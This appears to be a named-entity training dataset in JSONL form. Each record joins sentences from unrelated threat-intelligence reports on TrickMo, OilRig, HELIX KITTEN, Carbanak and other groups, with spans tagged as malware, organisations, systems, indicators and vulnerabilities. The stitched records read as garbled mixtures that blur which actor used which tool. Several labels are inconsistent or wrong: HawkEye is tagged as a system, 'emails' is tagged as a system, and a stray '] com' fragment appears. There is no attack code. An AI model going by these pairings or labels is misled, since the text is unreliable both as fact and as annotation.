{"text": "Among the various features we discuss in this post , we believe that TrickMo \u2019 s most significant novelty is an app recording feature , which gives it the ability to overcome the newer pushTAN app validations used by German banks . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East .", "spans": [{"start": 69, "end": 76, "label": "Malware"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 471, "end": 477, "label": "Organization"}, {"start": 564, "end": 580, "label": "Organization"}]}
{"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a \u201c kill switch \u201d that can remotely eliminate the malware from a mobile device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": [{"start": 393, "end": 407, "label": "Organization"}, {"start": 458, "end": 480, "label": "Indicator"}, {"start": 504, "end": 518, "label": "System"}, {"start": 540, "end": 552, "label": "Malware"}]}
{"text": "Why Do Desktop Trojans Use a Mobile Component ? PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": [{"start": 48, "end": 60, "label": "Organization"}, {"start": 88, "end": 93, "label": "Organization"}, {"start": 215, "end": 227, "label": "Organization"}, {"start": 348, "end": 354, "label": "Organization"}, {"start": 426, "end": 432, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}]}
{"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim \u2019 s online banking account and perform money transfers . PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": [{"start": 168, "end": 180, "label": "Organization"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 438, "end": 453, "label": "Indicator"}]}
{"text": "As a countermeasure , financial institutions introduced various second factor authentication ( 2FA ) methods . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": [{"start": 117, "end": 123, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 144, "end": 150, "label": "Organization"}, {"start": 155, "end": 163, "label": "Organization"}, {"start": 229, "end": 251, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 299, "end": 311, "label": "Malware"}]}
{"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) . Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 157, "end": 176, "label": "System"}, {"start": 335, "end": 347, "label": "Organization"}]}
{"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client \u2019 s mobile device . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . ] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 133, "end": 164, "label": "System"}, {"start": 375, "end": 381, "label": "Organization"}, {"start": 382, "end": 384, "label": "System"}]}
{"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser . In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": [{"start": 134, "end": 141, "label": "Organization"}, {"start": 242, "end": 256, "label": "Organization"}, {"start": 355, "end": 367, "label": "Organization"}, {"start": 378, "end": 399, "label": "Malware"}, {"start": 404, "end": 424, "label": "Malware"}, {"start": 436, "end": 453, "label": "Organization"}]}
{"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted . The threat actor attempted to compromise critical assets , such as database servers , billing servers , and the active directory . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": [{"start": 118, "end": 130, "label": "Organization"}, {"start": 266, "end": 267, "label": "System"}, {"start": 319, "end": 321, "label": "Indicator"}, {"start": 357, "end": 363, "label": "Organization"}]}
{"text": "Meanwhile , desktop banking Trojans developed the ability to execute various social engineering schemes by using web injections , a method that alters the content presented to the infected victim in their browser . The threat actor was able to leverage the web shell to run reconnaissance commands , steal credentials , and deploy other tools . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": [{"start": 219, "end": 231, "label": "Organization"}, {"start": 257, "end": 266, "label": "System"}, {"start": 428, "end": 449, "label": "Indicator"}]}
{"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component . In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The OilRig group continues to remain a highly active adversary in the Middle East region .", "spans": [{"start": 297, "end": 309, "label": "Organization"}, {"start": 341, "end": 346, "label": "System"}, {"start": 353, "end": 365, "label": "Organization"}]}
{"text": "But attackers were still constantly looking for new methods to steal TANs . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": [{"start": 149, "end": 161, "label": "Organization"}, {"start": 201, "end": 221, "label": "Organization"}, {"start": 317, "end": 325, "label": "Organization"}]}
{"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called \u201c ZitMo \u201d ( Zeus in the Mobile ) . The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": [{"start": 27, "end": 38, "label": "Malware"}, {"start": 129, "end": 134, "label": "Malware"}, {"start": 139, "end": 143, "label": "Malware"}, {"start": 166, "end": 175, "label": "Organization"}, {"start": 383, "end": 392, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 408, "end": 414, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}, {"start": 428, "end": 446, "label": "Organization"}]}
{"text": "This was used to bypass 2FA methods by intercepting the SMS messages coming from the bank and stealing the mTANs without the victim \u2019 s knowledge . We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": [{"start": 176, "end": 181, "label": "Organization"}, {"start": 296, "end": 305, "label": "Organization"}, {"start": 308, "end": 314, "label": "Organization"}, {"start": 319, "end": 343, "label": "Organization"}, {"start": 350, "end": 357, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}]}
{"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": [{"start": 140, "end": 145, "label": "Organization"}, {"start": 197, "end": 218, "label": "Malware"}, {"start": 377, "end": 384, "label": "Organization"}, {"start": 400, "end": 405, "label": "Organization"}]}
{"text": "From mTAN to pushTAN In the past few years , some banks in Europe , especially in Germany , stopped using SMS-based authentication and switched to dedicated pushTAN applications for 2FA schemes . Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": [{"start": 196, "end": 204, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}]}
{"text": "Instead of relying on SMS messages , which can be easily intercepted by third-party apps , these applications started using push notifications for users , containing the transaction details and the TAN . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 284, "end": 292, "label": "Malware"}, {"start": 362, "end": 367, "label": "Organization"}, {"start": 382, "end": 398, "label": "System"}, {"start": 413, "end": 427, "label": "Vulnerability"}, {"start": 438, "end": 446, "label": "Malware"}, {"start": 451, "end": 462, "label": "Malware"}, {"start": 486, "end": 495, "label": "Organization"}]}
{"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers . Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": [{"start": 147, "end": 155, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}]}
{"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it \u2019 s particularly challenging for mobile malware due to Android \u2019 s application sandbox . Russian cyber espionage actors use zero-day exploits in addition to less complex measures . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 169, "end": 176, "label": "System"}]}
{"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device . If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The email address is associated with the Lebanese domain of a major global financial institution .", "spans": [{"start": 132, "end": 141, "label": "Organization"}, {"start": 318, "end": 323, "label": "System"}, {"start": 389, "end": 410, "label": "Organization"}]}
{"text": "To get around this challenge , TrickMo \u2019 s developers added some new features to steal TANs using screen video recording and screen data scraping . The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 152, "end": 167, "label": "System"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 345, "end": 358, "label": "Malware"}, {"start": 379, "end": 392, "label": "Vulnerability"}]}
{"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? HawkEye is a versatile Trojan used by diverse actors for multiple purposes . In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 45, "end": 52, "label": "Malware"}, {"start": 90, "end": 97, "label": "System"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 198, "end": 210, "label": "Organization"}, {"start": 246, "end": 254, "label": "Malware"}]}
{"text": "It abuses accessibility services . In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": [{"start": 140, "end": 151, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 359, "end": 376, "label": "Malware"}]}
{"text": "Android \u2019 s accessibility services were originally developed by Google for the benefit of users with disabilities . The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 127, "end": 133, "label": "Organization"}, {"start": 148, "end": 160, "label": "Organization"}, {"start": 446, "end": 452, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]}
{"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more . Once in their possession , the actors use these compromised payment card credentials to generate further card information . Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": [{"start": 242, "end": 248, "label": "Organization"}, {"start": 403, "end": 415, "label": "Organization"}]}
{"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios . The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 139, "end": 144, "label": "Organization"}, {"start": 180, "end": 188, "label": "System"}, {"start": 269, "end": 281, "label": "Organization"}, {"start": 368, "end": 378, "label": "Organization"}]}
{"text": "Once on the device , as installed by a duped user , the TrickMo component opens and sends an intent to start the accessibility settings activity , coercing the user to grant it with accessibility permissions . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 232, "end": 236, "label": "Malware"}, {"start": 237, "end": 275, "label": "Malware"}, {"start": 405, "end": 423, "label": "Malware"}, {"start": 469, "end": 486, "label": "Malware"}, {"start": 579, "end": 597, "label": "Organization"}]}
{"text": "Then , it uses the accessibility service for its malicious operations , some of which include : Preventing the user from uninstalling the app Becoming the default SMS app by changing device settings Monitoring the currently running application ( s ) Scraping on-screen text Android operating systems include many dialog screens that require the denial , or approval , of app permissions and actions that have to receive input from the user by tapping a button on the screen . Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": [{"start": 274, "end": 281, "label": "System"}, {"start": 509, "end": 514, "label": "Organization"}, {"start": 829, "end": 838, "label": "Malware"}]}
{"text": "TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react . Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 226, "end": 243, "label": "System"}, {"start": 246, "end": 266, "label": "System"}, {"start": 386, "end": 409, "label": "Organization"}]}
{"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices . These actors scan websites for vulnerabilities to exploit to illicitly access databases . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": [{"start": 178, "end": 184, "label": "Organization"}, {"start": 302, "end": 321, "label": "Malware"}]}
{"text": "TrickMo \u2019 s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot . The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 54, "end": 67, "label": "System"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 181, "end": 194, "label": "System"}, {"start": 428, "end": 447, "label": "Malware"}, {"start": 474, "end": 480, "label": "Malware"}, {"start": 490, "end": 498, "label": "Malware"}, {"start": 561, "end": 575, "label": "Malware"}, {"start": 636, "end": 644, "label": "Malware"}]}
{"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the \u201c android.intent.action.BOOT_COMPLETED \u201d broadcast action and adding code that boots the application when the broadcast is fired . Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": [{"start": 100, "end": 136, "label": "Indicator"}, {"start": 271, "end": 287, "label": "System"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 485, "end": 494, "label": "Malware"}, {"start": 514, "end": 543, "label": "Indicator"}, {"start": 557, "end": 584, "label": "Malware"}]}
{"text": "This instruction is especially important for malware that tries to avoid user interaction by running in the background as a service . The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": [{"start": 138, "end": 144, "label": "Organization"}, {"start": 276, "end": 282, "label": "Organization"}, {"start": 382, "end": 388, "label": "Organization"}, {"start": 428, "end": 446, "label": "Malware"}, {"start": 457, "end": 474, "label": "Malware"}]}
{"text": "But TrickMo does things differently . The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 42, "end": 47, "label": "Organization"}, {"start": 67, "end": 83, "label": "System"}, {"start": 100, "end": 108, "label": "System"}, {"start": 219, "end": 229, "label": "Organization"}, {"start": 245, "end": 256, "label": "Malware"}, {"start": 259, "end": 266, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}]}
{"text": "Instead of running its service only at boot time , it registers a receiver that listens to the \u201c android.intent.action.SCREEN_ON \u201d and \u201c android.provider.Telephony.SMS_DELIVER \u201d broadcast actions . However , Brazilian actors commonly use several methods to do so , such as reselling cards they have created , paying bills with stolen cards in return for a portion of the bill's value and reselling illicitly obtained goods . While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": [{"start": 97, "end": 128, "label": "Indicator"}, {"start": 137, "end": 175, "label": "Indicator"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 477, "end": 502, "label": "Organization"}, {"start": 519, "end": 530, "label": "Malware"}, {"start": 541, "end": 548, "label": "Organization"}, {"start": 585, "end": 594, "label": "Organization"}, {"start": 620, "end": 626, "label": "Organization"}]}
{"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval . The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 118, "end": 129, "label": "Organization"}, {"start": 136, "end": 144, "label": "System"}, {"start": 176, "end": 184, "label": "System"}]}
{"text": "In other words , TrickMo \u2019 s service will start either after the device becomes interactive or after a new SMS message is received . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 270, "end": 280, "label": "Malware"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 397, "end": 399, "label": "System"}, {"start": 471, "end": 491, "label": "Indicator"}, {"start": 496, "end": 523, "label": "Indicator"}]}
{"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 178, "end": 182, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 454, "end": 464, "label": "Organization"}, {"start": 467, "end": 477, "label": "Indicator"}, {"start": 480, "end": 544, "label": "Indicator"}]}
{"text": "Some of the settings are Boolean values that act as switches . Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": [{"start": 121, "end": 127, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}]}
{"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals .", "spans": [{"start": 185, "end": 194, "label": "Malware"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 498, "end": 504, "label": "Organization"}, {"start": 507, "end": 516, "label": "Organization"}, {"start": 519, "end": 529, "label": "Organization"}, {"start": 532, "end": 543, "label": "Organization"}, {"start": 548, "end": 575, "label": "Organization"}]}
{"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": [{"start": 303, "end": 310, "label": "Malware"}, {"start": 395, "end": 405, "label": "System"}, {"start": 476, "end": 484, "label": "System"}, {"start": 493, "end": 506, "label": "Malware"}, {"start": 584, "end": 603, "label": "Organization"}, {"start": 739, "end": 748, "label": "Organization"}]}
{"text": "A TrickMo version from January 2020 contained code that checks if the app is running on a rooted device or an emulator to prevent analysis . According to Wikipedia , the CSS was formed in 1972 to integrate the NSA and the Service Cryptologic Elements ( SCE ) of the U.S armed forces . In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 300, "end": 308, "label": "Malware"}, {"start": 315, "end": 322, "label": "Malware"}]}
{"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java \u201c PBEWithMD5AndDES \u201d algorithm . The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": [{"start": 218, "end": 250, "label": "Malware"}, {"start": 421, "end": 433, "label": "Organization"}, {"start": 445, "end": 451, "label": "System"}, {"start": 473, "end": 483, "label": "Malware"}, {"start": 523, "end": 525, "label": "System"}]}
{"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo \u2019 s code contains a hardcoded URL of the C & C server . Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East \u2014 of note , targets appeared to be located in Bahrain and Kuwait .", "spans": [{"start": 79, "end": 86, "label": "Malware"}, {"start": 143, "end": 149, "label": "System"}, {"start": 218, "end": 232, "label": "System"}, {"start": 237, "end": 243, "label": "System"}, {"start": 313, "end": 332, "label": "Organization"}]}
{"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim \u2019 s phone . It seems that the main objective of the attackers was information gathering from the infected computers . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": [{"start": 287, "end": 294, "label": "Malware"}]}
{"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ? Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical .", "spans": [{"start": 299, "end": 308, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 396, "end": 408, "label": "Organization"}, {"start": 440, "end": 458, "label": "Organization"}]}
{"text": "Is the malware already set as the default SMS application ? Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 148, "end": 156, "label": "Organization"}, {"start": 190, "end": 197, "label": "Organization"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 215, "end": 221, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 289, "end": 295, "label": "System"}, {"start": 321, "end": 330, "label": "Indicator"}, {"start": 334, "end": 373, "label": "Organization"}]}
{"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 168, "end": 192, "label": "System"}, {"start": 204, "end": 222, "label": "Organization"}, {"start": 351, "end": 365, "label": "Organization"}, {"start": 387, "end": 393, "label": "System"}, {"start": 405, "end": 426, "label": "Indicator"}, {"start": 450, "end": 455, "label": "Organization"}]}
{"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim \u2019 s device . The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", "spans": [{"start": 204, "end": 209, "label": "Organization"}, {"start": 244, "end": 269, "label": "System"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 357, "end": 372, "label": "Malware"}, {"start": 421, "end": 445, "label": "Organization"}, {"start": 463, "end": 472, "label": "Organization"}, {"start": 481, "end": 504, "label": "Organization"}]}
{"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": [{"start": 110, "end": 120, "label": "Organization"}, {"start": 146, "end": 170, "label": "Vulnerability"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 269, "end": 292, "label": "Organization"}, {"start": 314, "end": 320, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}, {"start": 372, "end": 383, "label": "Malware"}]}
{"text": "It can also be sold on the dark web and used in various spoofing attacks . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": [{"start": 106, "end": 130, "label": "Vulnerability"}, {"start": 180, "end": 192, "label": "Organization"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}]}
{"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint . The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": [{"start": 230, "end": 247, "label": "Organization"}, {"start": 346, "end": 357, "label": "Malware"}, {"start": 363, "end": 386, "label": "Malware"}, {"start": 407, "end": 414, "label": "Organization"}, {"start": 443, "end": 449, "label": "Organization"}, {"start": 486, "end": 511, "label": "Organization"}]}
